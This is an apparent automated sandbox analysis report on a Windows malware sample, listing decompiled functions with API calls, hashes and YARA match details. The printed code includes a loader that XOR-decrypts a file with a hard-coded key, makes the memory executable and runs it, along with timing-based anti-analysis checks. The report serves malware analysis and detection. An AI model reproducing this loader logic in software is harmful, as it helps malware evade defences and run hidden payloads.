                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0041A450(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF20(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                            0x0041a453
                            0x0041a456
                            0x0041a45f
                            0x0041a467
                            0x0041a475
                            0x0041a479

                            APIs
                            • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E00409AA0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BDD0( &_v284, 0x104);
						E0041C440( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                            0x00409aab
                            0x00409ab3
                            0x00409ab5
                            0x00409aba
                            0x00409abf
                            0x00409ad2
                            0x00409ad7
                            0x00409ae0
                            0x00409aec
                            0x00409aff
                            0x00409b04
                            0x00409b07
                            0x00409b10
                            0x00409b22
                            0x00409b27
                            0x00409b2c
                            0x00000000
                            0x00000000
                            0x00409b2e
                            0x00409b32
                            0x00000000
                            0x00000000
                            0x00409b34
                            0x00000000
                            0x00409b32
                            0x00409b36
                            0x00409b39
                            0x00409b3f
                            0x00409b41
                            0x00409b4c
                            0x00409b51
                            0x00409b54
                            0x00409b61
                            0x00409b6c
                            0x00409b6e
                            0x00409b74
                            0x00409b78
                            0x00409b7b
                            0x00409b7b
                            0x00409b82
                            0x00409b85
                            0x00409b8a
                            0x00409b97
                            0x00409ac6
                            0x00409ac6
                            0x00409ac6

                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                            • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                            • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                            • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                            C-Code - Quality: 100%
                            			E0041A5F0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF20(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                            0x0041a607
                            0x0041a612
                            0x0041a61d
                            0x0041a621

                            APIs
                            • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: &EA
                            • API String ID: 1279760036-1330915590
                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 59threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 201 408308-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a470 210->212 213 40838d 210->213 212->213 213->211
                            C-Code - Quality: 63%
                            			E00408308(void* __edx, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t24;
				int _t29;
				void* _t32;
				void* _t34;
				signed char _t39;

				asm("sbb edi, edi");
				asm("std");
				asm("hlt");
				_t1 = __edx + 0x55;
				 *_t1 =  *(__edx + 0x55) << 1;
				_t39 =  *_t1;
				_t32 = _t34;
				_v68 = 0;
				E0041BE20( &_v67, 0, 0x3f);
				E0041C9C0( &_v68, 3);
				_t14 = E0040ACE0(_t39, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E40(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t29 = _t15;
				if(_t29 != 0) {
					_t24 = _a8;
					_t15 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t41 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t29(_t24, 0x8003, _t32 + (E0040A470(_t41, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                            0x00408308
                            0x0040830a
                            0x0040830d
                            0x0040830e
                            0x0040830e
                            0x0040830e
                            0x00408311
                            0x0040831f
                            0x00408323
                            0x0040832e
                            0x0040833e
                            0x0040834e
                            0x00408353
                            0x0040835a
                            0x0040835d
                            0x0040836a
                            0x0040836c
                            0x0040836e
                            0x0040838b
                            0x0040838b
                            0x0040838d
                            0x00408392

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: ae062f95abbf2e34a3362aed9973a98173dddafaa68f7340c1eb130177d1f422
                            • Instruction ID: 8e1c76695cc15e715ca50465393cb0f79c0d632a80173a0aba09960ccb057104
                            • Opcode Fuzzy Hash: ae062f95abbf2e34a3362aed9973a98173dddafaa68f7340c1eb130177d1f422
                            • Instruction Fuzzy Hash: 5E01B571A8032877E721A6958C03FFE775C6B41B54F050159FF04BB1C2DAA8690542EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 216 408310-40831f 217 408328-40835a call 41c9c0 call 40ace0 call 414e40 216->217 218 408323 call 41be20 216->218 225 40835c-40836e PostThreadMessageW 217->225 226 40838e-408392 217->226 218->217 227 408370-40838a call 40a470 225->227 228 40838d 225->228 227->228 228->226
                            C-Code - Quality: 82%
                            			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE20( &_v67, 0, 0x3f);
				E0041C9C0( &_v68, 3);
				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                            0x00408310
                            0x0040831f
                            0x00408323
                            0x0040832e
                            0x0040833e
                            0x0040834e
                            0x00408353
                            0x0040835a
                            0x0040835d
                            0x0040836a
                            0x0040836c
                            0x0040836e
                            0x0040838b
                            0x0040838b
                            0x00000000
                            0x0040838d
                            0x00408392

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                            • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                            • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                            • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A622 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 258 41a622-41a647 call 41af20 260 41a64c-41a661 RtlFreeHeap 258->260
                            C-Code - Quality: 58%
                            			E0041A622(void* __esi, intOrPtr _a11, void* _a15, long _a19, void* _a23, intOrPtr _a37) {
				char _t13;
				void* _t19;

				_a37 = _a37 - __esi;
				asm("a16 xlatb");
				asm("out dx, eax");
				_t10 = _a11;
				_push(__esi);
				_t6 = _t10 + 0xc74; // 0xc74
				E0041AF20(_t19, _a11, _t6,  *((intOrPtr*)(_a11 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a15, _a19, _a23); // executed
				return _t13;
			}





                            0x0041a623
                            0x0041a627
                            0x0041a629
                            0x0041a633
                            0x0041a639
                            0x0041a63f
                            0x0041a647
                            0x0041a65d
                            0x0041a661

                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 5466a3c7689492fe8f9de9d1d41959b15ac87c4716cbee0e51d87b3e6aef476a
                            • Instruction ID: cd8e9116cd56eeea8269715e7e8455ca775269357dc0eb2edff77a274d3d209d
                            • Opcode Fuzzy Hash: 5466a3c7689492fe8f9de9d1d41959b15ac87c4716cbee0e51d87b3e6aef476a
                            • Instruction Fuzzy Hash: C5F0EDB1210214AFD718EF65DC48EE73769EF88354F01425EF90897241C631E811CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 261 41a630-41a646 262 41a64c-41a661 RtlFreeHeap 261->262 263 41a647 call 41af20 261->263 263->262
                            C-Code - Quality: 100%
                            			E0041A630(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                            0x0041a63f
                            0x0041a647
                            0x0041a65d
                            0x0041a661

                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A78F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 264 41a78f-41a7aa call 41af20 266 41a7af-41a7c4 LookupPrivilegeValueW 264->266
                            C-Code - Quality: 100%
                            			E0041A78F(WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t10;
				void* _t15;

				_t7 = _v0;
				E0041AF20(_t15, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t10;
			}






                            0x0041a793
                            0x0041a7aa
                            0x0041a7c0
                            0x0041a7c4

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 41ff4af20946d5aa30d61d7bbf5aeec8a549fa04e46ac48c3e910b6fbb44b532
                            • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                            • Opcode Fuzzy Hash: 41ff4af20946d5aa30d61d7bbf5aeec8a549fa04e46ac48c3e910b6fbb44b532
                            • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 267 41a790-41a7a9 268 41a7af-41a7c4 LookupPrivilegeValueW 267->268 269 41a7aa call 41af20 267->269 269->268
                            C-Code - Quality: 100%
                            			E0041A790(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                            0x0041a7aa
                            0x0041a7c0
                            0x0041a7c4

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0041A670(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				_t3 = _t5 + 0xc7c; // 0x8bec97d1
				E0041AF20(_t10, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                            0x0041a673
                            0x0041a682
                            0x0041a68a
                            0x0041a698

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A66B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E0041A66B(intOrPtr _a3, int _a7) {
				void* _t13;

				asm("adc ecx, edx");
				_t6 = _a3;
				_t3 = _t6 + 0xc7c; // 0x8bec97d1
				E0041AF20(_t13, _a3, _t3,  *((intOrPtr*)(_a3 + 0xa14)), 0, 0x36);
				ExitProcess(_a7);
			}




                            0x0041a66b
                            0x0041a673
                            0x0041a682
                            0x0041a68a
                            0x0041a698

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: d3e304961623e0cafa82c136944fe7c2b17506e405657fb6babb0763df470661
                            • Instruction ID: 8ba298a813dd72448b52bdce0f0841dd63784532cc6a02a9cd9b05fe3fef58cf
                            • Opcode Fuzzy Hash: d3e304961623e0cafa82c136944fe7c2b17506e405657fb6babb0763df470661
                            • Instruction Fuzzy Hash: 4ED02BB42085402BC700CB288CC5E933BA4CF45310F04856EB8DA5B203C134E905C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 01321210 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 38%
                            			E01321210(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v20;
				char* _v24;
				long _v28;
				void* _v32;
				long _v36;
				void* __ebp;

				_v12 = 0;
				_v28 = 0;
				_v24 = "248058040134";
				_v20 = E01321649(_a12, 0x13300f8);
				_push(2);
				_push(0);
				_push(_v20);
				E01321BB2(__ebx, __edx, __edi, __esi, __eflags);
				_push(_v20);
				_v28 = E01321ABA(__ebx, _v20, __edi, __esi, __eflags);
				_push(0);
				_push(0);
				_push(_v20);
				E01321BB2(__ebx, _v20, __edi, __esi, __eflags);
				_v32 = E0132148F(__ebx, _v20, __edi, _v28);
				E01321900(_v32, _v28, 1, _v20);
				while(_v12 < _v28) {
					asm("cdq");
					 *(_v32 + _v12) =  *(_v32 + _v12) & 0x000000ff ^ _v24[_v12 % 0xc] & 0x000000ff;
					_v12 = _v12 + 1;
				}
				VirtualProtect(_v32, _v28, 0x40,  &_v36);
				return _v32();
			}










                            0x01321216
                            0x0132121d
                            0x01321224
                            0x0132123c
                            0x0132123f
                            0x01321241
                            0x01321246
                            0x01321247
                            0x01321252
                            0x0132125b
                            0x0132125e
                            0x01321260
                            0x01321265
                            0x01321266
                            0x0132127a
                            0x0132128b
                            0x01321293
                            0x0132129e
                            0x013212be
                            0x013212c6
                            0x013212c6
                            0x013212d9
                            0x013212e5

                            APIs
                              • Part of subcall function 01321649: __fsopen.LIBCMT ref: 01321656
                            • _fseek.LIBCMT ref: 01321247
                            • _ftell.LIBCMT ref: 01321253
                            • _fseek.LIBCMT ref: 01321266
                              • Part of subcall function 01321BB2: __lock_file.LIBCMT ref: 01321BFD
                              • Part of subcall function 01321BB2: __fseek_nolock.LIBCMT ref: 01321C0D
                            • _malloc.LIBCMT ref: 01321272
                              • Part of subcall function 0132148F: __FF_MSGBANNER.LIBCMT ref: 013214B2
                              • Part of subcall function 0132148F: __NMSG_WRITE.LIBCMT ref: 013214B9
                              • Part of subcall function 0132148F: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,0132571C,?,00000001,?,?,01321EEE,00000018,0132D4A0,0000000C,01321F7F), ref: 01321506
                            • __fread_nolock.LIBCMT ref: 0132128B
                            • VirtualProtect.KERNEL32(?,00000000,00000040,?), ref: 013212D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: _fseek$AllocHeapProtectVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_ftell_malloc
                            • String ID: 248058040134
                            • API String ID: 3704003650-1212554544
                            • Opcode ID: 4528d6f80380741a590b097523fe314493de831cf1fd3ed5fa2504d85b405794
                            • Instruction ID: f1bfeb3cd10206685e5728230f941454a6bac0d9a4406f8d9f18214ab653cb0d
                            • Opcode Fuzzy Hash: 4528d6f80380741a590b097523fe314493de831cf1fd3ed5fa2504d85b405794
                            • Instruction Fuzzy Hash: 82217FB1E0021A9FDB04EFD4C881FBFBB75BF94304F144558E611A7240D675AA51CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01325B55 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E01325B55(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x132f5d8; // 0xbb40e64e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1330878 = _t6;
				 *0x1330874 = _t22;
				 *0x1330870 = _t25;
				 *0x133086c = _t21;
				 *0x1330868 = _t27;
				 *0x1330864 = _t26;
				 *0x1330890 = ss;
				 *0x1330884 = cs;
				 *0x1330860 = ds;
				 *0x133085c = es;
				 *0x1330858 = fs;
				 *0x1330854 = gs;
				asm("pushfd");
				_pop( *0x1330888);
				 *0x133087c =  *_t31;
				 *0x1330880 = _v0;
				 *0x133088c =  &_a4;
				 *0x13307c8 = 0x10001;
				_t11 =  *0x1330880; // 0x0
				 *0x133077c = _t11;
				 *0x1330770 = 0xc0000409;
				 *0x1330774 = 1;
				_t12 =  *0x132f5d8; // 0xbb40e64e
				_v812 = _t12;
				_t13 =  *0x132f5dc; // 0x44bf19b1
				_v808 = _t13;
				 *0x13307c0 = IsDebuggerPresent();
				_push(1);
				E01327168(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x132ca38);
				if( *0x13307c0 == 0) {
					_push(1);
					E01327168(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b5b
                            0x01325b5d
                            0x01325b5d
                            0x0132947b
                            0x01329480
                            0x01329486
                            0x0132948c
                            0x01329492
                            0x01329498
                            0x0132949e
                            0x013294a5
                            0x013294ac
                            0x013294b3
                            0x013294ba
                            0x013294c1
                            0x013294c8
                            0x013294c9
                            0x013294d2
                            0x013294da
                            0x013294e2
                            0x013294ed
                            0x013294f7
                            0x013294fc
                            0x01329501
                            0x0132950b
                            0x01329515
                            0x0132951a
                            0x01329520
                            0x01329525
                            0x01329531
                            0x01329536
                            0x01329538
                            0x01329540
                            0x0132954b
                            0x01329558
                            0x0132955a
                            0x0132955c
                            0x01329561
                            0x01329575

                            APIs
